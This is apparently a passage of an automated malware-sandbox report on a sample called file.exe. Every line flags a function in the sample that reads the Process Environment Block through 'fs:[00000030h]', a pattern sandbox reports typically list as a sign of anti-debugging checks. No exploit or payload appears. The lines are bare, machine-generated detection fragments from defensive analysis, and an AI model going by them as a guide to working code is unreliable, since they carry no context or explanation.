                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018660B8 mov ecx, dword ptr fs:[00000030h]4_2_018660B8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179A020 mov eax, dword ptr fs:[00000030h]4_2_0179A020
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C020 mov eax, dword ptr fs:[00000030h]4_2_0179C020
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018220DE mov eax, dword ptr fs:[00000030h]4_2_018220DE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018260E0 mov eax, dword ptr fs:[00000030h]4_2_018260E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE016 mov eax, dword ptr fs:[00000030h]4_2_017BE016
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE016 mov eax, dword ptr fs:[00000030h]4_2_017BE016
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE016 mov eax, dword ptr fs:[00000030h]4_2_017BE016
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE016 mov eax, dword ptr fs:[00000030h]4_2_017BE016
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01824000 mov ecx, dword ptr fs:[00000030h]4_2_01824000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01842000 mov eax, dword ptr fs:[00000030h]4_2_01842000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01842000 mov eax, dword ptr fs:[00000030h]4_2_01842000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01842000 mov eax, dword ptr fs:[00000030h]4_2_01842000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01842000 mov eax, dword ptr fs:[00000030h]4_2_01842000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01842000 mov eax, dword ptr fs:[00000030h]4_2_01842000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01842000 mov eax, dword ptr fs:[00000030h]4_2_01842000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01842000 mov eax, dword ptr fs:[00000030h]4_2_01842000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01842000 mov eax, dword ptr fs:[00000030h]4_2_01842000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C0F0 mov eax, dword ptr fs:[00000030h]4_2_0179C0F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E20F0 mov ecx, dword ptr fs:[00000030h]4_2_017E20F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A80E9 mov eax, dword ptr fs:[00000030h]4_2_017A80E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0179A0E3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01836030 mov eax, dword ptr fs:[00000030h]4_2_01836030
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826050 mov eax, dword ptr fs:[00000030h]4_2_01826050
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A208A mov eax, dword ptr fs:[00000030h]4_2_017A208A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185C3CD mov eax, dword ptr fs:[00000030h]4_2_0185C3CD
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018443D4 mov eax, dword ptr fs:[00000030h]4_2_018443D4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018443D4 mov eax, dword ptr fs:[00000030h]4_2_018443D4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E3DB mov eax, dword ptr fs:[00000030h]4_2_0184E3DB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E3DB mov eax, dword ptr fs:[00000030h]4_2_0184E3DB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E3DB mov ecx, dword ptr fs:[00000030h]4_2_0184E3DB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184E3DB mov eax, dword ptr fs:[00000030h]4_2_0184E3DB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C310 mov ecx, dword ptr fs:[00000030h]4_2_0179C310
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0310 mov ecx, dword ptr fs:[00000030h]4_2_017C0310
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA30B mov eax, dword ptr fs:[00000030h]4_2_017DA30B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA30B mov eax, dword ptr fs:[00000030h]4_2_017DA30B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA30B mov eax, dword ptr fs:[00000030h]4_2_017DA30B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D63FF mov eax, dword ptr fs:[00000030h]4_2_017D63FF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE3F0 mov eax, dword ptr fs:[00000030h]4_2_017BE3F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE3F0 mov eax, dword ptr fs:[00000030h]4_2_017BE3F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE3F0 mov eax, dword ptr fs:[00000030h]4_2_017BE3F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A83C0 mov eax, dword ptr fs:[00000030h]4_2_017A83C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A83C0 mov eax, dword ptr fs:[00000030h]4_2_017A83C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A83C0 mov eax, dword ptr fs:[00000030h]4_2_017A83C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A83C0 mov eax, dword ptr fs:[00000030h]4_2_017A83C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186A352 mov eax, dword ptr fs:[00000030h]4_2_0186A352
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01848350 mov ecx, dword ptr fs:[00000030h]4_2_01848350
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov eax, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov eax, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov eax, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov ecx, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov eax, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov eax, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798397 mov eax, dword ptr fs:[00000030h]4_2_01798397
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798397 mov eax, dword ptr fs:[00000030h]4_2_01798397
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798397 mov eax, dword ptr fs:[00000030h]4_2_01798397
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E388 mov eax, dword ptr fs:[00000030h]4_2_0179E388
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E388 mov eax, dword ptr fs:[00000030h]4_2_0179E388
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E388 mov eax, dword ptr fs:[00000030h]4_2_0179E388
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C438F mov eax, dword ptr fs:[00000030h]4_2_017C438F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C438F mov eax, dword ptr fs:[00000030h]4_2_017C438F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184437C mov eax, dword ptr fs:[00000030h]4_2_0184437C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01820283 mov eax, dword ptr fs:[00000030h]4_2_01820283
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01820283 mov eax, dword ptr fs:[00000030h]4_2_01820283
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01820283 mov eax, dword ptr fs:[00000030h]4_2_01820283
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179826B mov eax, dword ptr fs:[00000030h]4_2_0179826B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4260 mov eax, dword ptr fs:[00000030h]4_2_017A4260
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4260 mov eax, dword ptr fs:[00000030h]4_2_017A4260
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4260 mov eax, dword ptr fs:[00000030h]4_2_017A4260
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov eax, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov ecx, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov eax, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov eax, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov eax, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov eax, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6259 mov eax, dword ptr fs:[00000030h]4_2_017A6259
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179A250 mov eax, dword ptr fs:[00000030h]4_2_0179A250
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179823B mov eax, dword ptr fs:[00000030h]4_2_0179823B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B02E1 mov eax, dword ptr fs:[00000030h]4_2_017B02E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B02E1 mov eax, dword ptr fs:[00000030h]4_2_017B02E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B02E1 mov eax, dword ptr fs:[00000030h]4_2_017B02E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA2C3 mov eax, dword ptr fs:[00000030h]4_2_017AA2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA2C3 mov eax, dword ptr fs:[00000030h]4_2_017AA2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA2C3 mov eax, dword ptr fs:[00000030h]4_2_017AA2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA2C3 mov eax, dword ptr fs:[00000030h]4_2_017AA2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA2C3 mov eax, dword ptr fs:[00000030h]4_2_017AA2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01828243 mov eax, dword ptr fs:[00000030h]4_2_01828243
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01828243 mov ecx, dword ptr fs:[00000030h]4_2_01828243
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185A250 mov eax, dword ptr fs:[00000030h]4_2_0185A250
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185A250 mov eax, dword ptr fs:[00000030h]4_2_0185A250
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B02A0 mov eax, dword ptr fs:[00000030h]4_2_017B02A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B02A0 mov eax, dword ptr fs:[00000030h]4_2_017B02A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE284 mov eax, dword ptr fs:[00000030h]4_2_017DE284
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE284 mov eax, dword ptr fs:[00000030h]4_2_017DE284
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D656A mov eax, dword ptr fs:[00000030h]4_2_017D656A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D656A mov eax, dword ptr fs:[00000030h]4_2_017D656A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D656A mov eax, dword ptr fs:[00000030h]4_2_017D656A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018205A7 mov eax, dword ptr fs:[00000030h]4_2_018205A7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018205A7 mov eax, dword ptr fs:[00000030h]4_2_018205A7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018205A7 mov eax, dword ptr fs:[00000030h]4_2_018205A7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8550 mov eax, dword ptr fs:[00000030h]4_2_017A8550
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8550 mov eax, dword ptr fs:[00000030h]4_2_017A8550
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE53E mov eax, dword ptr fs:[00000030h]4_2_017CE53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE53E mov eax, dword ptr fs:[00000030h]4_2_017CE53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE53E mov eax, dword ptr fs:[00000030h]4_2_017CE53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE53E mov eax, dword ptr fs:[00000030h]4_2_017CE53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE53E mov eax, dword ptr fs:[00000030h]4_2_017CE53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01836500 mov eax, dword ptr fs:[00000030h]4_2_01836500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC5ED mov eax, dword ptr fs:[00000030h]4_2_017DC5ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC5ED mov eax, dword ptr fs:[00000030h]4_2_017DC5ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A25E0 mov eax, dword ptr fs:[00000030h]4_2_017A25E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A65D0 mov eax, dword ptr fs:[00000030h]4_2_017A65D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA5D0 mov eax, dword ptr fs:[00000030h]4_2_017DA5D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA5D0 mov eax, dword ptr fs:[00000030h]4_2_017DA5D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE5CF mov eax, dword ptr fs:[00000030h]4_2_017DE5CF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE5CF mov eax, dword ptr fs:[00000030h]4_2_017DE5CF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C45B1 mov eax, dword ptr fs:[00000030h]4_2_017C45B1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C45B1 mov eax, dword ptr fs:[00000030h]4_2_017C45B1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE59C mov eax, dword ptr fs:[00000030h]4_2_017DE59C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D4588 mov eax, dword ptr fs:[00000030h]4_2_017D4588
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A2582 mov eax, dword ptr fs:[00000030h]4_2_017A2582
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A2582 mov ecx, dword ptr fs:[00000030h]4_2_017A2582
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CA470 mov eax, dword ptr fs:[00000030h]4_2_017CA470
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CA470 mov eax, dword ptr fs:[00000030h]4_2_017CA470
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CA470 mov eax, dword ptr fs:[00000030h]4_2_017CA470
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185A49A mov eax, dword ptr fs:[00000030h]4_2_0185A49A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179645D mov eax, dword ptr fs:[00000030h]4_2_0179645D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C245A mov eax, dword ptr fs:[00000030h]4_2_017C245A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182A4B0 mov eax, dword ptr fs:[00000030h]4_2_0182A4B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA430 mov eax, dword ptr fs:[00000030h]4_2_017DA430
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E420 mov eax, dword ptr fs:[00000030h]4_2_0179E420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E420 mov eax, dword ptr fs:[00000030h]4_2_0179E420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E420 mov eax, dword ptr fs:[00000030h]4_2_0179E420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C427 mov eax, dword ptr fs:[00000030h]4_2_0179C427
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8402 mov eax, dword ptr fs:[00000030h]4_2_017D8402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8402 mov eax, dword ptr fs:[00000030h]4_2_017D8402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8402 mov eax, dword ptr fs:[00000030h]4_2_017D8402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A04E5 mov ecx, dword ptr fs:[00000030h]4_2_017A04E5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D44B0 mov ecx, dword ptr fs:[00000030h]4_2_017D44B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A64AB mov eax, dword ptr fs:[00000030h]4_2_017A64AB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185A456 mov eax, dword ptr fs:[00000030h]4_2_0185A456
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182C460 mov ecx, dword ptr fs:[00000030h]4_2_0182C460
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8770 mov eax, dword ptr fs:[00000030h]4_2_017A8770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184678E mov eax, dword ptr fs:[00000030h]4_2_0184678E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018547A0 mov eax, dword ptr fs:[00000030h]4_2_018547A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0750 mov eax, dword ptr fs:[00000030h]4_2_017A0750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2750 mov eax, dword ptr fs:[00000030h]4_2_017E2750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2750 mov eax, dword ptr fs:[00000030h]4_2_017E2750
